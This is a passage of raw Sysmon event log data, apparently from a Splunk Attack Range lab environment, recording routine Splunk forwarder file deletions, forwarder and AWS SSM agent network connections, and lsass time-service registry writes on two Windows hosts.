Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AE7F116D19B2D9FB425B09862895E95,SHA256=52CF100DE4CD32877BD7F1E57E29F19E76D4AD62E737B82E8290C4FCEABDB598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103660Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:14.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F23EA3052F4E54D8FCCCE2A5C1CDAA9E,SHA256=309F6BBF824D79FC47519174077BB4F73DAB5072DC1B73091388E4A9C65EC975,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081472Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:14.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2390CE85E8EBAF2F3B932F64186CDE8,SHA256=4599FEA5A0D85287E62B711589849C57B9138409F0FF7FF3955EA58BA5BA52F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103662Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:15.941{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CF36E3E00E6F56B804E7948AB2DAC93,SHA256=4C9E5DF26F95C477C36153C3D8738C476C295AD46E737F7CA2E50DA631FA527D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081473Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:15.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9444F247D4BD9C616B9E994C2C011ED6,SHA256=EDA2CCD11FBA41D0D3D1967451A5FE176E389FFD4204E15336864147096087AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103661Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:13.491{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49532-false10.0.1.12-8000- 23542300x8000000000000000103663Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:16.941{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4A15DCDFB7C0D1145FDE66FAB965817,SHA256=9E2FC14059F01D641D704ABEFBFEE359252E98F3AC9062C7E7A339CAFBE6DF81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081474Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:16.203{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8797140C3E96CC291CBD23256E159053,SHA256=11C0E6172AC09674800D0C0B50A8568343828A93DF2FA05BA788838EFFD39BFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103664Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:17.941{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C659AF6AFB9725013CB1BE714536ACC,SHA256=6D8670B09F41B3708502A6DC07C7C899E65F76919C0D3646E6A4E2D9B031D86E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081476Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:15.755{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50031-false10.0.1.12-8000- 23542300x800000000000000081475Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:17.203{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6227260DF054F4ADD5D2B0E25C96DACF,SHA256=B561F3511DB49B9FD9F33E1C05D7E3AAC2DB4B692ED1E0ECFE758D2CE0464690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103665Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:18.941{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1DDACC37B7C6445EE0683E4EBE6E136,SHA256=10BF6749083A5B8EF148A6D9BD0AE18F06A0014870BD8C295978AE5A712181EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081478Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:18.984{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CD37999D6E5838C8D6D45511BE48D248,SHA256=38BC0E69474EE8AB97196541AE1217BA3C22DAB954E21448997683A532C58ACC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081477Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:18.203{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51C70FC7184E2012A4BF00CDCB820614,SHA256=BA371CC340CAF60286EA31788B8B0C5FEB70CCDCC0D89D532E21FD2D0B6A39BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103666Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:19.941{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CCEBEC883F77526283D435237B214C2,SHA256=259D959ED668CC7D6A73D0B8F20570F2F8D2F5E57CCD1CBAE7480A1562F8D589,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081479Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:19.203{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B92050D91DF7771FE6628C001DC60E2,SHA256=E720F2B9EE8596CAA1731A8AE541A0506E4D669D694E73B1A041A48116BD5D13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103668Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:20.943{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AFD7BF64D08A825BDA74536CC2C036D,SHA256=C499B7BBF05A9163DF50077353E8713AB4F6D677D8FD6517BB6B4AD686133186,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000081490Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000081489Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00178aac) 13241300x800000000000000081488Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ec-0x3ca2af20) 13241300x800000000000000081487Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f4-0x9e671720) 13241300x800000000000000081486Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fd-0x002b7f20) 13241300x800000000000000081485Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000081484Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00178aac) 13241300x800000000000000081483Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ec-0x3ca2af20) 13241300x800000000000000081482Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f4-0x9e671720) 13241300x800000000000000081481Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:51:20.563{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fd-0x002b7f20) 23542300x800000000000000081480Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:20.203{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45D6579B938D6466E7F7428E4757D97A,SHA256=0F5D0E3D3A10E6278C7BF845FD85F25FACFBAD1780A23C9254BD6121183B29CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103667Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:19.348{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49533-false10.0.1.12-8000- 23542300x8000000000000000103669Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:21.958{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E92EBD310FE18EFA76D835C83B4F61A0,SHA256=D70ACB6256ED5751323A2E4CBAA51E74ECC2633996655AD40FFDA8287366E485,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081491Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:21.219{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BCC2CBB0C0952992FD39714821CF735,SHA256=C5693E9D84F3D60A6CC281761769CC32CD27EE75F69BC9FF60E8E466199C5E83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103671Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:22.966{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85B8B7F8E44DF8B46A1C8941CEC67A39,SHA256=0A97A38430CCA31121AC4365B297C8069C3F8A7540962AAEC823941249EA5AFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081496Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:21.310{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50035-false169.254.169.254-80http 354300x800000000000000081495Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:21.198{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50034-false169.254.169.254-80http 354300x800000000000000081494Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:21.164{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50033-false169.254.169.254-80http 354300x800000000000000081493Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:21.163{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50032-false169.254.169.254-80http 23542300x800000000000000081492Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:22.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71843618949B4E310F9EF579F7B24443,SHA256=F2223B0B02DD5E35132D49BF22FFA739DD86A08254D455F4C5A95FD62F48DD8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103670Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:22.258{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-023MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103673Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:23.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12929872D0BBA482BFE1D59E28D0DA57,SHA256=1E607F47370E6BCE3E339D7FBF5550E7CB2534EC870499D9ED4948BB17C35AE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081497Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:23.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07C179EC0358B3B1914DA5F756CCC654,SHA256=99C1D7EC2DDD56CFDEC7FDB12E259BA32F3CB4BFD453EE35C7D22B8D65B5AAAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103672Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:23.264{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-024MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103674Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:24.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2EE48682B63AEA1F7DCB813E8A49D2C,SHA256=86B8C0BA7F5790CAA7EDD8E42F4BCCBB8813C608DAD555EE46055D1972ED38B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081499Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:24.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A34EE9E1B84AAE5458EA8C9345217E24,SHA256=02AFD8AD822408DB8BCA833F21381B2FD8D1F45A69DB2B444B3896D591AE446D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081498Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:21.703{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50036-false10.0.1.12-8000- 23542300x8000000000000000103675Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:25.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=169CC4041767B9E56F7BE0D53336766F,SHA256=215EC687D36CA4B6866F1072B8CFEA11A5BFE6D8285B36424DD282783E6395C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081500Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:25.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE4BEF7C7932FBF675BE34F4F0D2B675,SHA256=E094E534DD9B98037454979AAB2B52CF3F51D977CA52395DD51BE60C187A1156,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103676Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:26.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A15A2B73C644A59C72E577B2F66598C,SHA256=84F53D26F4FF2005AE1A503F89A83BF1EDA4276F8E7DA2F10D90187BBDF71A79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081501Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:26.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11B3FC226863E83CFD41DE2994449D88,SHA256=A8746767DC3F735396ED9F70A334F52FFE3E0477CC3D25478A2210BFEF58096E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103678Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:27.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A82DFF5E5D7F643F8394F8A9401E7967,SHA256=05F5A4396086A26E89AD6F3C65DAED6FF9387ECCE62F15B9C671FD46D73F397D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081502Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:27.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE5FF76ED8FEC258F3AF3D4F74D52E49,SHA256=20A99560AF2E8E515E1E7884842040F6566C736D358737F786ECE37818F29428,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103677Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:25.314{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49534-false10.0.1.12-8000- 23542300x8000000000000000103679Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:28.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E299183A2FD6044EC5611AF86986468,SHA256=584A3FA833D515DD92AB4E3185E2C7774C8C68437F8E6694DFD74B103D2A6148,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081503Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:28.245{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDE3F2C949CBE4F7320ABBB6A01FA326,SHA256=D4C6AAE81141825FBC839C643CB0EFE375CE34B9A591E74AD2748960F1C990EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103680Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:29.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBF2519070D60F8D24F19DA4A84C051D,SHA256=A353EC5FD843E45A61D8A3CE428417FD9E9AF997CD9E88B13801B13B743A60D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081505Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:29.651{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081504Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:29.245{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F5DA99B5CF22A815BDE3FEEEA428A2E,SHA256=1CA340899A6E58D642CC5F92192B84AA8C2F75BD86A5C8B4017F5BF86C4BF526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103681Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:30.969{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82C9ECC4530D895618B504D3A5617F5B,SHA256=F6EB5230635EBA748F5B41A6A1A20F80242FF86CBF9A597611DED001D6B8F93E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081507Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:27.703{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50037-false10.0.1.12-8000- 23542300x800000000000000081506Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 